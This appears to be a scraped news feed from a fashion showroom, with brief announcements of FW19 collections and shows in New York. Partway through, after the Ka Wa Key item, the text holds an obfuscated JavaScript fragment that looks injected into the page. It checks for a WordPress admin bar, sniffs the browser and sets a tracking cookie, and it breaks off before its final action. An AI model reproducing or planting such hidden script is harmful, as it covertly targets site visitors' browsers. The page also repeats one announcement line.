Aisha Diri FW19 at Liberty Fairs NY Women Show !
We are showing Aisha Diri Fall/Winter 2019 collection at the Capsule NY show (2/25-2/27, Pier 94) .
We are showing Aisha Diri Fall/Winter 2019 collection at the Capsule NY show (2/25-2/27, Pier 94) .
Neodandi debut FW19 collection in a rebirth of luxury with alluring silhouettes for both men and women.
Seven designers originated in Asia revealed their collections during the AFC FW19 runway show.
London-based Ka Wa Key debut its FW19 “Cowboy Who Cried Wasabi Tears” at the NY Men’s Day today. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’′,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function…
We are very exited to work for Neodandi and Glory Be Thy Name’s NYFW FW19 show!
We are very happy to work again with AFC, an incubation project by Japan’s Vantan and PARCO !
We are very happy to work with Ka Wa Key, London-based gender-fluid label by Ka Wa Key Chow and Jarno Leppanen!
CAMERONBATES is now at New York Tokyo Showroom.
Yoshiyuki Tabi shoes are now at our showroom.
this is Sweden debut USA at NY Men’s Day, kicking off NYFW: Men’s SS19.